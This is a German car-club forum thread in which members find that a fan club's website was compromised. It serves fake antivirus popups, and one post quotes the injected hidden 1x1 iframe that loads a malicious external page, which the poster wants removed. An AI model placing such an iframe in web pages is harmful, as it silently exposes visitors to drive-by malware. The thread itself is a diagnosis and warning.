Zum Inhalt springen

homepage xm-ig


marc1234

Empfohlene Beiträge

habe probleme beim aufrufen der seite www.xm-ig.de. es kommt eine meldung, nach welcher ein virus eliminiert ist, dann wird der computer runtergefahren. hab so was noch nie erlebt. vielleicht ist einer der ig ja mitleser hier. verwende momentan einen rechner einer grossfirma, am virenschutz etc. kann es also nicht liegen.

um missverständnissen vorzubeugen: möchte nur auf das problem aufmerksam machen, aber NIEMANDEN SCHLECHTMACHEN ODER ANKLAGEN! ich mag die seite grundsätzlich.

viel glück beim beheben des problems.

gruss marc1234

Link zu diesem Kommentar
Auf anderen Seiten teilen

Vl. solltest du mal einen gründlichen Virencheck durchführen?? Surfst du mit dem Internet Explorer? (Das ist ein Verbrechen...)

Nimm Opera oder Firefox, falls nicht schon so ist.

Also vl. liegt der Fehler in deinem System???

Link zu diesem Kommentar
Auf anderen Seiten teilen

Läuft einwandfrei. Falls es ein Firmenrechner ist, könnten die Admins einen eigenen Filter eingebaut haben, der privates daddeln verhindern soll.

In einem Betrieb, den ich kenne erscheint bei dem Versuch, Ebay aufzurufen ein Bluescreen und wenn der Benutzer sich beim Admin beschwert gibt es einen Anschiß

Link zu diesem Kommentar
Auf anderen Seiten teilen

Wenn er sich dafür auch noch beschwert, ist er ja schon recht dreist *g*

Aber Bluescreen bei ebay aufmachen... Ich hab noch nicht einen Bluescreen unter Vista erlebt, fällt mir gerade so ein, aber die wollten ja einen redscreen machen ^^

Naja beherzige mal unsere beiden Vorschläge, vl. stimmt ja irgendwas von beidem

Link zu diesem Kommentar
Auf anderen Seiten teilen

Moin...

Mmmmh, ich bin mir im Moment auch nicht Sicher ob die Seite wirklich "Clean" ist. Irgendwas scheint da faul zu sein.

Markus

Link zu diesem Kommentar
Auf anderen Seiten teilen

arbeite auf microsoft xp mit explorer, aber virenschutztechnisch gemäss neuesten standards upgedated.

probleme mit der site hatte ich noch nie. die haben hier einen filter, es erscheint eine entsprechende mitteilung und gut ist.

denke nach wie vor, dass das problem an der seite liegt.

gruss marc1234

Link zu diesem Kommentar
Auf anderen Seiten teilen

Das Problem liegt auf der Seite. So wie das aussieht, hat sich da was eingenistet, was nach "h**p://wfrules.ru/[...]" und "h**p://91.203.92.4/[...]" verlinkt. "91.203.92.4" scheint ein "Trojaner Umschlagplatz" zu sein.

Markus

Link zu diesem Kommentar
Auf anderen Seiten teilen

Das Problem liegt definitiv an der Seite! Jeder, der beim Besuchen der Seite KEINE Meldung von seinem Virenscanner bekommt, sollte dringend ein Update durchführen!!! - Es dürfte am Hostinganbieter der Seite liegen - es sollte sich ein Werbe-Popup öffnen und dort liegt meiner Einschätzung nach der Hund begraben.

Also bitte vorsichtig sein!

Link zu diesem Kommentar
Auf anderen Seiten teilen

Dieser Passus sollte dringend aus dem Quelltext entfernt werden: <iframe width=1 height=1 border=0 frameborder=0 src="http://wfrules.ru/rotate/index.php"></iframe>

Link zu diesem Kommentar
Auf anderen Seiten teilen

Bei mir erscheint ja auch die Warnung des Virenscanners. Soll ich da dann auf "löschen" klicken, wenn der fragt?

Aja, bei der Seite von Kluppkaputt schlägt der Scanner auch an, zumindest bei mir...

Link zu diesem Kommentar
Auf anderen Seiten teilen

Gast Gerhard T

Ich konnte einfach nicht widerstehen, mir diese Seite anzuschauen.

Hochinteressant: da kommt ein Popup mit so einem Pseudo-Virenscanner, der in C:\Windows\ einen Virus findet und mir gleich wärmstens ein scan.exe empfiehlt, welches ich doch in Zukunft verwenden möge.

Na sowas?

Seit wann hat mein Unix ein "C:\Windows"?

Kicher...

<zynisch>Ist er nicht süss, der hoffnungvolle Hacker-Nachwuchs? Muss aber noch viel lernen...</zynisch>

Aber wieder ernsthaft: Benutzern von M$-Windoof jeglicher Ausprägung würd ich im Moment echt nicht empfehlen, diese Seite aufzurufen.

Link zu diesem Kommentar
Auf anderen Seiten teilen

GSASpecialViersen

Moin,

dazu kommt, dass mich als Member der Xm-IG neulich eine Newsmail erreicht hat. Der derzeitige Webmaster ist aus persönlichen Gründen nicht in der Lage, die Homepage zu betreuen. Es wird aber eine Vertretung gesucht. Ob sich da jetzt schon was getan hat, entzieht sich meiner Kenntnis. Die Mail habe ich vor Ewigkeiten erhalten.

LG,

Oliver

Link zu diesem Kommentar
Auf anderen Seiten teilen

Wenn er sich dafür auch noch beschwert, ist er ja schon recht dreist *g*

Aber Bluescreen bei ebay aufmachen... Ich hab noch nicht einen Bluescreen unter Vista erlebt, fällt mir gerade so ein, aber die wollten ja einen redscreen machen ^^

Naja beherzige mal unsere beiden Vorschläge, vl. stimmt ja irgendwas von beidem

In der Firma laufen die Desktops mit XP, die Server (natürlich) mit Linux. Die ahnungslosen Benutzer glauben wohl tatsächlich, ihr Rechner habe einen Fehler.

Link zu diesem Kommentar
Auf anderen Seiten teilen

  • 1 Monat später...

Die Seite ist wohl mittlerweile ganz offline?

Es kommt nur noch das Angebot eines Domainhändlers.

Es wäre schade, wenn die XM-IG aus dem Web verschwände. Wenn es sonst gar keine Möglichkeiten gibt, wäre ich bereit, die Seite zu hosten und zu betreuen.

Meine E-Mail-Adresse steht im Profil!

Link zu diesem Kommentar
Auf anderen Seiten teilen

die xm-ig hat auf der seite geschrieben, daß sie zum 15.08.08 abgeschaltet wird. soweit ich weiß, ist tim dran, den zugang zu bekommen (da ist wohl was mit passwörtern im argen).

Link zu diesem Kommentar
Auf anderen Seiten teilen

Dann sollte Georg auf jeden Fall mal einen Unterlassungsanspruch gegenüber dem jetzigen Domainhandel-Seitenbetreiber geltend machen.

Ich betreue schon 3 Internetpräsenzen und hab auch genug Webspace frei. Wenn's ne andere Lösung gibt, freu ich mich, aber ich könnte die Seiten schnell, kostenlos und unbürokratisch wieder ins Netz stellen und auch pflegen, falls es woanders Probleme gibt.

Link zu diesem Kommentar
Auf anderen Seiten teilen

ACCM Jürgen P. Schäfer

@Lile221,

ich glaube, daß Deine Unterstützung gut gebraucht werden kann, habe Dir eine Mail geschickt!

Grüße, Jürgen

Link zu diesem Kommentar
Auf anderen Seiten teilen

Hallo Leutz,

hatte schon Anfang September nur Fehlermeldung, Seite ist noch down.

(Nutze Linux-Ubuntu 8.04 LTS und Firefox 3.0.3)

Würde mich auch freuen, wenn es bald wieder einen Auftritt gibticon7.gif

Gruß vom Hightower

Link zu diesem Kommentar
Auf anderen Seiten teilen

  • 1 Monat später...

Erstelle ein Benutzerkonto oder melde Dich an, um zu kommentieren

Du musst ein Benutzerkonto haben, um einen Kommentar verfassen zu können

Benutzerkonto erstellen

Neues Benutzerkonto für unsere Community erstellen. Es ist einfach!

Neues Benutzerkonto erstellen

Anmelden

Du hast bereits ein Benutzerkonto? Melde Dich hier an.

Jetzt anmelden

Nutzungsbedingungen

Wenn Sie auf unsere unter www.andre-citroen-club.de und www.acc-intern.de liegenden Angebote zugreifen, stimmen Sie unseren Nutzungsbedingungen zu. Falls dies nicht der Fall ist, ist Ihnen eine Nutzung unseres Angebotes nicht gestattet!

Datenschutz

Die Betreiber dieser Seiten nehmen den Schutz Ihrer persönlichen Daten sehr ernst. Wir behandeln Ihre personenbezogenen Daten vertraulich und entsprechend der gesetzlichen Datenschutzvorschriften sowie dieser Datenschutzerklärung.

Impressum

Clubleitung des André Citroën Clubs
Stéphane Bonutto und Sven Winter

Postanschrift
Postfach 230041
55051 Mainz

Clubzentrale in Mainz
Ralf Claus
Telefon: +49 6136 – 40 85 017
Telefax: +49 6136 – 92 69 347
E-Mail: zentrale@andre-citroen-club.de

Anschrift des Clubleiters:

Sven Winter
Eichenstr. 16
65779 Kelkheim/Ts.

E – Mail: sven.winter@andre-citroen-club.de
Telefon: +49 1515 7454578

Verantwortlich für den Inhalt nach § 55 Abs. 2 RStV
Martin Stahl
In den Vogelgärten 7
71397 Leutenbach

E-Mail: admin@andre-citroen-club.de

×
×
  • Neu erstellen...